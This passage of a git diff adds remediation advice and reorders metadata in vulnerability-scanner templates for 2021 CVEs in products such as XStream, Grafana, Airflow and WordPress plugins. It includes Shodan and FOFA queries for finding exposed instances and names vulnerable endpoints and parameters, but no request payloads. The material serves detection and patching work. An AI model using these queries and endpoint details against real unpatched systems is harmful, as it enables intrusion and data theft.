a/http/cves/2021/CVE-2021-37304.yaml +++ b/http/cves/2021/CVE-2021-37304.yaml @@ -6,6 +6,8 @@ info: severity: high description: | An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface. + remediation: | + Upgrade Jeecg Boot to a version higher than 2.4.5 to mitigate the vulnerability. reference: - https://github.com/jeecgboot/jeecg-boot/issues/2793 - https://nvd.nist.gov/vuln/detail/CVE-2021-37304 @@ -15,15 +17,15 @@ info: cve-id: CVE-2021-37304 cwe-id: CWE-732 epss-score: 0.0101 - cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:* epss-percentile: 0.81823 + cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: title:"Jeecg-Boot" - fofa-query: title="JeecgBoot 企业级低代码平台" + max-request: 1 vendor: jeecg product: jeecg + shodan-query: title:"Jeecg-Boot" + fofa-query: title="JeecgBoot 企业级低代码平台" tags: cve,cve2021,jeecg,exposure http: diff --git a/http/cves/2021/CVE-2021-37305.yaml b/http/cves/2021/CVE-2021-37305.yaml index b9878c9d47..c70026920c 100644 --- a/http/cves/2021/CVE-2021-37305.yaml +++ b/http/cves/2021/CVE-2021-37305.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Jeecg Boot <= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system. + remediation: | + Upgrade Jeecg Boot to version 2.4.6 or later to fix the vulnerability. reference: - https://github.com/jeecgboot/jeecg-boot/issues/2794 - https://nvd.nist.gov/vuln/detail/CVE-2021-37305 @@ -15,15 +17,15 @@ info: cve-id: CVE-2021-37305 cwe-id: CWE-732 epss-score: 0.00246 - cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:* epss-percentile: 0.618 + cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: title:"Jeecg-Boot" - fofa-query: title="JeecgBoot 企业级低代码平台" + max-request: 1 vendor: jeecg product: jeecg + shodan-query: title:"Jeecg-Boot" + fofa-query: title="JeecgBoot 企业级低代码平台" tags: cve,cve2021,jeecg,exposure http: diff --git a/http/cves/2021/CVE-2021-37416.yaml b/http/cves/2021/CVE-2021-37416.yaml index 2a262a22fa..2a17b674bb 100644 --- a/http/cves/2021/CVE-2021-37416.yaml +++ b/http/cves/2021/CVE-2021-37416.yaml @@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page. + remediation: | + Upgrade to a patched version of Zoho ManageEngine ADSelfService Plus (version >6103) to mitigate this vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416 - https://blog.stmcyber.com/vulns/cve-2021-37416/ @@ -15,14 +17,14 @@ info: cve-id: CVE-2021-37416 cwe-id: CWE-79 epss-score: 0.00118 - cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* epss-percentile: 0.45063 + cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"ManageEngine" verified: true + max-request: 1 vendor: zohocorp product: manageengine_adselfservice_plus + shodan-query: http.title:"ManageEngine" tags: cve,cve2021,zoho,xss http: diff --git a/http/cves/2021/CVE-2021-37538.yaml b/http/cves/2021/CVE-2021-37538.yaml index 719d4c60a5..d12f633a94 100644 --- a/http/cves/2021/CVE-2021-37538.yaml +++ b/http/cves/2021/CVE-2021-37538.yaml @@ -5,6 +5,8 @@ info: author: whoever severity: critical description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality. + remediation: | + Upgrade PrestaShop SmartBlog to version 4.0.6 or later to mitigate the SQL Injection vulnerability. reference: - https://blog.sorcery.ie/posts/smartblog_sqli/ - https://nvd.nist.gov/vuln/detail/CVE-2021-37538 @@ -15,13 +17,13 @@ info: cve-id: CVE-2021-37538 cwe-id: CWE-89 epss-score: 0.02621 - cpe: cpe:2.3:a:smartdatasoft:smartblog:*:*:*:*:*:prestashop:*:* epss-percentile: 0.88974 + cpe: cpe:2.3:a:smartdatasoft:smartblog:*:*:*:*:*:prestashop:*:* metadata: max-request: 1 - framework: prestashop vendor: smartdatasoft product: smartblog + framework: prestashop tags: cve,cve2021,prestashop,smartblog,sqli http: diff --git a/http/cves/2021/CVE-2021-37573.yaml b/http/cves/2021/CVE-2021-37573.yaml index eec981df1a..3c22f59263 100644 --- a/http/cves/2021/CVE-2021-37573.yaml +++ b/http/cves/2021/CVE-2021-37573.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's "404 Page not Found" error page. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: - https://seclists.org/fulldisclosure/2021/Aug/13 - https://nvd.nist.gov/vuln/detail/CVE-2021-37573 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-37573 cwe-id: CWE-79 epss-score: 0.00303 - cpe: cpe:2.3:a:tiny_java_web_server_project:tiny_java_web_server:*:*:*:*:*:*:*:* epss-percentile: 0.65782 + cpe: cpe:2.3:a:tiny_java_web_server_project:tiny_java_web_server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tiny_java_web_server_project diff --git a/http/cves/2021/CVE-2021-37580.yaml b/http/cves/2021/CVE-2021-37580.yaml index aa05d80977..50aa7eadd9 100644 --- a/http/cves/2021/CVE-2021-37580.yaml +++ b/http/cves/2021/CVE-2021-37580.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication. + remediation: | + Apply the patch or upgrade to the latest version of Apache ShenYu to fix the authentication bypass vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-37580 - https://github.com/fengwenhua/CVE-2021-37580 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-37580 cwe-id: CWE-287 epss-score: 0.93293 - cpe: cpe:2.3:a:apache:shenyu:2.3.0:*:*:*:*:*:*:* epss-percentile: 0.98709 + cpe: cpe:2.3:a:apache:shenyu:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2021/CVE-2021-37589.yaml b/http/cves/2021/CVE-2021-37589.yaml index ee72981c2c..a18f93051c 100644 --- a/http/cves/2021/CVE-2021-37589.yaml +++ b/http/cves/2021/CVE-2021-37589.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Virtua Cobranca before 12R allows blind SQL injection on the login page. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Virtua Software Cobranca <12R. reference: - https://github.com/luca-regne/my-cves/tree/main/CVE-2021-37589 - https://www.virtuasoftware.com.br/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2021-37589 cwe-id: CWE-89 epss-score: 0.0051 - cpe: cpe:2.3:a:virtuasoftware:cobranca:*:*:*:*:*:*:*:* epss-percentile: 0.73614 + cpe: cpe:2.3:a:virtuasoftware:cobranca:*:*:*:*:*:*:*:* metadata: - max-request: 3 - shodan-query: http.favicon.hash:876876147 verified: true + max-request: 3 vendor: virtuasoftware product: cobranca + shodan-query: http.favicon.hash:876876147 tags: cve,cve2021,virtua,sqli http: diff --git a/http/cves/2021/CVE-2021-37704.yaml b/http/cves/2021/CVE-2021-37704.yaml index 05bfadcd38..329912cb97 100644 --- a/http/cves/2021/CVE-2021-37704.yaml +++ b/http/cves/2021/CVE-2021-37704.yaml @@ -5,6 +5,8 @@ info: author: whoever severity: medium description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache. + remediation: | + Remove or restrict access to the phpinfo.php file in the phpfastcache library. reference: - https://github.com/PHPSocialNetwork/phpfastcache/pull/813 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704 - https://github.com/PHPSocialNetwork/phpfastcache/security/advisories/GHSA-cvh5-p6r6-g2qc @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-37704 cwe-id: CWE-200,CWE-668 epss-score: 0.00282 - cpe: cpe:2.3:a:phpfastcache:phpfastcache:*:*:*:*:*:*:*:* epss-percentile: 0.64484 + cpe: cpe:2.3:a:phpfastcache:phpfastcache:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: phpfastcache diff --git a/http/cves/2021/CVE-2021-37833.yaml b/http/cves/2021/CVE-2021-37833.yaml index 42076feab4..f06d1a975f 100644 --- a/http/cves/2021/CVE-2021-37833.yaml +++ b/http/cves/2021/CVE-2021-37833.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Hotel Druid 3.0.2 contains a cross-site scripting vulnerability in multiple pages which allows for arbitrary execution of JavaScript commands. + remediation: | + To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://github.com/dievus/CVE-2021-37833 - https://www.hoteldruid.com @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-37833 cwe-id: CWE-79 epss-score: 0.0009 - cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.2:*:*:*:*:*:*:* epss-percentile: 0.37259 + cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.2:*:*:*:*:*:*:* metadata: max-request: 4 vendor: digitaldruid diff --git a/http/cves/2021/CVE-2021-38314.yaml b/http/cves/2021/CVE-2021-38314.yaml index aed5fc432e..e23fa87b43 100644 --- a/http/cves/2021/CVE-2021-38314.yaml +++ b/http/cves/2021/CVE-2021-38314.yaml @@ -5,6 +5,8 @@ info: author: meme-lord severity: medium description: WordPress Redux Framework plugin through 4.2.11 is susceptible to information disclosure. The plugin registers several unique AJAX actions available to unauthenticated users in the includes function in redux-core/class-redux-core.php. These are predictable, given that they are based on an md5 hash of the site URL with a known salt value of -redux and an md5 hash of the previous hash with a known salt value of -support. An attacker can potentially employ these AJAX actions to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of the site's AUTH_KEY concatenated with the SECURE_AUTH_KEY. + remediation: | + Update WordPress Redux Framework to version 4.2.12 or later. reference: - https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/ - https://wahaz.medium.com/unauthenticated-sensitive-information-disclosure-at-redacted-2702224098c @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-38314 cwe-id: CWE-916,CWE-200 epss-score: 0.00153 - cpe: cpe:2.3:a:redux:gutenberg_template_library_\&_redux_framework:*:*:*:*:*:wordpress:*:* epss-percentile: 0.50938 + cpe: cpe:2.3:a:redux:gutenberg_template_library_\&_redux_framework:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: redux product: gutenberg_template_library_\&_redux_framework + framework: wordpress tags: cve,cve2021,wordpress,wp-plugin http: diff --git a/http/cves/2021/CVE-2021-38540.yaml b/http/cves/2021/CVE-2021-38540.yaml index 8055278008..2482761119 100644 --- a/http/cves/2021/CVE-2021-38540.yaml +++ b/http/cves/2021/CVE-2021-38540.yaml @@ -5,25 +5,25 @@ info: author: pdteam severity: critical description: Apache Airflow Airflow >=2.0.0 and <2.1.3 does not protect the variable import endpoint which allows unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution. + remediation: Upgrade to Apache Airflow 2.1.3 or higher. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-38540 - https://lists.apache.org/thread.html/rb34c3dd1a815456355217eef34060789f771b6f77c3a3dec77de2064%40%3Cusers.airflow.apache.org%3E - https://lists.apache.org/thread.html/rac2ed9118f64733e47b4f1e82ddc8c8020774698f13328ca742b03a2@%3Cannounce.apache.org%3E - remediation: Upgrade to Apache Airflow 2.1.3 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-38540 cwe-id: CWE-269,CWE-306 epss-score: 0.006 - cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* epss-percentile: 0.75724 + cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true - shodan-query: title:"Sign In - Airflow" + max-request: 2 vendor: apache product: airflow + shodan-query: title:"Sign In - Airflow" tags: cve,cve2021,apache,airflow,rce,intrusive http: diff --git a/http/cves/2021/CVE-2021-38647.yaml b/http/cves/2021/CVE-2021-38647.yaml index 7754833123..3bd11c8ddd 100644 --- a/http/cves/2021/CVE-2021-38647.yaml +++ b/http/cves/2021/CVE-2021-38647.yaml @@ -5,21 +5,21 @@ info: author: daffainfo,xstp severity: critical description: Microsoft Open Management Infrastructure is susceptible to remote code execution (OMIGOD). + remediation: Updates for this vulnerability were published on GitHub on August 11, 2021. reference: - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647 - https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647 - https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/ - https://github.com/microsoft/omi - remediation: Updates for this vulnerability were published on GitHub on August 11, 2021. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-38647 cwe-id: CWE-287 epss-score: 0.97445 - cpe: cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:* epss-percentile: 0.99918 + cpe: cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microsoft diff --git a/http/cves/2021/CVE-2021-38702.yaml b/http/cves/2021/CVE-2021-38702.yaml index 65e460ce81..f031b2ed1b 100644 --- a/http/cves/2021/CVE-2021-38702.yaml +++ b/http/cves/2021/CVE-2021-38702.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 are susceptible to reflected cross-site scripting via the 'u' parameter of ft.php. + remediation: | + Apply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability. reference: - https://seclists.org/fulldisclosure/2021/Aug/20 - https://nvd.nist.gov/vuln/detail/CVE-2021-38702 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-38702 cwe-id: CWE-79 epss-score: 0.0057 - cpe: cpe:2.3:o:cyberoamworks:netgenie_c0101b1-20141120-ng11vo_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.75034 + cpe: cpe:2.3:o:cyberoamworks:netgenie_c0101b1-20141120-ng11vo_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cyberoamworks diff --git a/http/cves/2021/CVE-2021-38704.yaml b/http/cves/2021/CVE-2021-38704.yaml index 77c68cb035..04dd3a74de 100644 --- a/http/cves/2021/CVE-2021-38704.yaml +++ b/http/cves/2021/CVE-2021-38704.yaml @@ -5,6 +5,8 @@ info: author: alph4byt3 severity: medium description: ClinicCases 7.3.3 is susceptible to multiple reflected cross-site scripting vulnerabilities that could allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft. + remediation: | + To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://github.com/sudonoodle/CVE-2021-38704 - https://nvd.nist.gov/vuln/detail/CVE-2021-38704 @@ -15,13 +17,13 @@ info: cve-id: CVE-2021-38704 cwe-id: CWE-79 epss-score: 0.00141 - cpe: cpe:2.3:a:cliniccases:cliniccases:7.3.3:*:*:*:*:*:*:* epss-percentile: 0.49142 + cpe: cpe:2.3:a:cliniccases:cliniccases:7.3.3:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:"ClinicCases",html:"/cliniccases/" vendor: cliniccases product: cliniccases + shodan-query: http.title:"ClinicCases",html:"/cliniccases/" tags: xss,cve,cve2021,cliniccases http: diff --git a/http/cves/2021/CVE-2021-38751.yaml b/http/cves/2021/CVE-2021-38751.yaml index 94191019b2..b77fe3d593 100644 --- a/http/cves/2021/CVE-2021-38751.yaml +++ b/http/cves/2021/CVE-2021-38751.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack vector for MITM. + remediation: | + Upgrade ExponentCMS to a version higher than 2.6 or apply the provided patch to fix the Host Header Injection vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-38751 - https://github.com/exponentcms/exponent-cms/issues/1544 @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-38751 cwe-id: CWE-116 epss-score: 0.00242 - cpe: cpe:2.3:a:exponentcms:exponentcms:*:*:*:*:*:*:*:* epss-percentile: 0.6141 + cpe: cpe:2.3:a:exponentcms:exponentcms:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: exponentcms diff --git a/http/cves/2021/CVE-2021-39141.yaml b/http/cves/2021/CVE-2021-39141.yaml index b6029df484..7b7c694925 100644 --- a/http/cves/2021/CVE-2021-39141.yaml +++ b/http/cves/2021/CVE-2021-39141.yaml @@ -6,6 +6,8 @@ info: severity: high description: | XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade XStream to a version that is not affected by CVE-2021-39141. reference: - http://x-stream.github.io/CVE-2021-39141.html - https://x-stream.github.io/CVE-2021-39141.html @@ -18,8 +20,8 @@ info: cve-id: CVE-2021-39141 cwe-id: CWE-434 epss-score: 0.15968 - cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* epss-percentile: 0.95247 + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project diff --git a/http/cves/2021/CVE-2021-39144.yaml b/http/cves/2021/CVE-2021-39144.yaml index f81da81227..9a187a5834 100644 --- a/http/cves/2021/CVE-2021-39144.yaml +++ b/http/cves/2021/CVE-2021-39144.yaml @@ -6,6 +6,8 @@ info: severity: high description: | XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted. + remediation: | + Upgrade XStream to a version that is not affected by CVE-2021-39144. reference: - https://x-stream.github.io/CVE-2021-39144.html - https://github.com/x-stream/xstream/security/advisories/GHSA-j9h8-phrw-h4fh @@ -18,8 +20,8 @@ info: cve-id: CVE-2021-39144 cwe-id: CWE-306,CWE-502 epss-score: 0.97244 - cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* epss-percentile: 0.99759 + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project diff --git a/http/cves/2021/CVE-2021-39146.yaml b/http/cves/2021/CVE-2021-39146.yaml index 8d669df994..7f36db4789 100644 --- a/http/cves/2021/CVE-2021-39146.yaml +++ b/http/cves/2021/CVE-2021-39146.yaml @@ -6,6 +6,8 @@ info: severity: high description: | XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted. + remediation: | + Upgrade XStream to a version that is not affected by CVE-2021-39146. reference: - https://x-stream.github.io/CVE-2021-39146.html - https://github.com/x-stream/xstream/security/advisories/GHSA-p8pq-r894-fm8f @@ -18,8 +20,8 @@ info: cve-id: CVE-2021-39146 cwe-id: CWE-434 epss-score: 0.15366 - cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* epss-percentile: 0.95168 + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project diff --git a/http/cves/2021/CVE-2021-39152.yaml b/http/cves/2021/CVE-2021-39152.yaml index 0dd993e3b6..62ebb3be5f 100644 --- a/http/cves/2021/CVE-2021-39152.yaml +++ b/http/cves/2021/CVE-2021-39152.yaml @@ -6,6 +6,8 @@ info: severity: high description: | XStream before 1.4.18 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream with a Java runtime version 14 to 8. This makes it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade XStream to version 1.4.18 or later to mitigate the vulnerability. reference: - https://x-stream.github.io/CVE-2021-39152.html - https://github.com/x-stream/xstream/security/advisories/GHSA-xw4p-crpj-vjx2 @@ -18,8 +20,8 @@ info: cve-id: CVE-2021-39152 cwe-id: CWE-502 epss-score: 0.00668 - cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* epss-percentile: 0.77147 + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml index 3b28f7f775..700c3b1594 100644 --- a/http/cves/2021/CVE-2021-39165.yaml +++ b/http/cves/2021/CVE-2021-39165.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected. + remediation: | + Upgrade Cachet to a version higher than 2.3.18 or apply the necessary patches provided by the vendor. reference: - https://www.leavesongs.com/PENETRATION/cachet-from-laravel-sqli-to-bug-bounty.html - https://github.com/fiveai/Cachet/commit/27bca8280419966ba80c6fa283d985ddffa84bb6 @@ -18,14 +20,14 @@ info: cve-id: CVE-2021-39165 cwe-id: CWE-287 epss-score: 0.02927 - cpe: cpe:2.3:a:chachethq:cachet:*:*:*:*:*:*:*:* epss-percentile: 0.89509 + cpe: cpe:2.3:a:chachethq:cachet:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: http.favicon.hash:-1606065523 + max-request: 1 vendor: chachethq product: cachet + shodan-query: http.favicon.hash:-1606065523 tags: cve,cve2021,cachet,sqli http: diff --git a/http/cves/2021/CVE-2021-39211.yaml b/http/cves/2021/CVE-2021-39211.yaml index fb3cfbb7e4..445adefd92 100644 --- a/http/cves/2021/CVE-2021-39211.yaml +++ b/http/cves/2021/CVE-2021-39211.yaml @@ -5,19 +5,19 @@ info: author: dogasantos,noraj severity: medium description: GLPI 9.2 and prior to 9.5.6 is susceptible to information disclosure via the telemetry endpoint, which discloses GLPI and server information. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: This issue is fixed in version 9.5.6. As a workaround, remove the file ajax/telemetry.php, which is not needed for usual GLPI functions. reference: - https://github.com/glpi-project/glpi/security/advisories/GHSA-xx66-v3g5-w825 - https://github.com/glpi-project/glpi/releases/tag/9.5.6 - https://nvd.nist.gov/vuln/detail/CVE-2021-39211 - remediation: This issue is fixed in version 9.5.6. As a workaround, remove the file ajax/telemetry.php, which is not needed for usual GLPI functions. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-39211 cwe-id: CWE-668,CWE-200 epss-score: 0.00208 - cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* epss-percentile: 0.58059 + cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: glpi-project diff --git a/http/cves/2021/CVE-2021-39226.yaml b/http/cves/2021/CVE-2021-39226.yaml index fd1ce9cba8..815739640c 100644 --- a/http/cves/2021/CVE-2021-39226.yaml +++ b/http/cves/2021/CVE-2021-39226.yaml @@ -5,26 +5,26 @@ info: author: Evan Rubinstein severity: high description: Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default). + remediation: 'This issue has been resolved in versions 8.1.6 and 7.5.11. If you cannot upgrade you can block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects.' reference: - https://github.com/advisories/GHSA-69j6-29vr-p3j9 - https://nvd.nist.gov/vuln/detail/CVE-2021-39226 - https://github.com/grafana/grafana/commit/2d456a6375855364d098ede379438bf7f0667269 - https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-1-6/ - http://www.openwall.com/lists/oss-security/2021/10/05/4 - remediation: 'This issue has been resolved in versions 8.1.6 and 7.5.11. If you cannot upgrade you can block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects.' classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L cvss-score: 7.3 cve-id: CVE-2021-39226 cwe-id: CWE-287 epss-score: 0.9726 - cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* epss-percentile: 0.99768 + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: title:"Grafana" vendor: grafana product: grafana + shodan-query: title:"Grafana" tags: cve,cve2021,grafana,kev http: diff --git a/http/cves/2021/CVE-2021-39312.yaml b/http/cves/2021/CVE-2021-39312.yaml index ac6141fbaa..09be4eae8a 100644 --- a/http/cves/2021/CVE-2021-39312.yaml +++ b/http/cves/2021/CVE-2021-39312.yaml @@ -5,25 +5,25 @@ info: author: DhiyaneshDK severity: high description: WordPress True Ranker before version 2.2.4 allows sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file via local file inclusion. + remediation: Fixed in version 2.2.4 reference: - https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79 - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39312 - https://plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.php - https://nvd.nist.gov/vuln/detail/CVE-2021-39312 - remediation: Fixed in version 2.2.4 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-39312 cwe-id: CWE-22 epss-score: 0.05291 - cpe: cpe:2.3:a:trueranker:true_ranker:*:*:*:*:*:wordpress:*:* epss-percentile: 0.92075 + cpe: cpe:2.3:a:trueranker:true_ranker:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: trueranker product: true_ranker + framework: wordpress tags: unauth,lfr,wpscan,cve,cve2021,wp-plugin,lfi,wp,wordpress http: diff --git a/http/cves/2021/CVE-2021-39316.yaml b/http/cves/2021/CVE-2021-39316.yaml index 13bfe59f99..0be15b661e 100644 --- a/http/cves/2021/CVE-2021-39316.yaml +++ b/http/cves/2021/CVE-2021-39316.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: WordPress Zoomsounds plugin 6.45 and earlier allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter. + remediation: | + Update to the latest version of WordPress DZS Zoomsounds plugin (>=6.51) to fix the Local File Inclusion vulnerability. reference: - https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316 @@ -17,13 +19,13 @@ info: cve-id: CVE-2021-39316 cwe-id: CWE-22 epss-score: 0.42316 - cpe: cpe:2.3:a:digitalzoomstudio:zoomsounds:*:*:*:*:*:wordpress:*:* epss-percentile: 0.96839 + cpe: cpe:2.3:a:digitalzoomstudio:zoomsounds:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: digitalzoomstudio product: zoomsounds + framework: wordpress tags: wordpress,wp-plugin,zoomsounds,wpscan,packetstorm,cve,wp,cve2021,lfi http: diff --git a/http/cves/2021/CVE-2021-39320.yaml b/http/cves/2021/CVE-2021-39320.yaml index a04b846b6a..be9d53ee75 100644 --- a/http/cves/2021/CVE-2021-39320.yaml +++ b/http/cves/2021/CVE-2021-39320.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Under Construction plugin before 1.19 contains a cross-site scripting vulnerability. The plugin echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file on certain configurations, including Apache+modPHP. + remediation: | + Update to the latest version of the WordPress Under Construction plugin (1.19 or higher) to fix the XSS vulnerability. reference: - https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875 - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39320 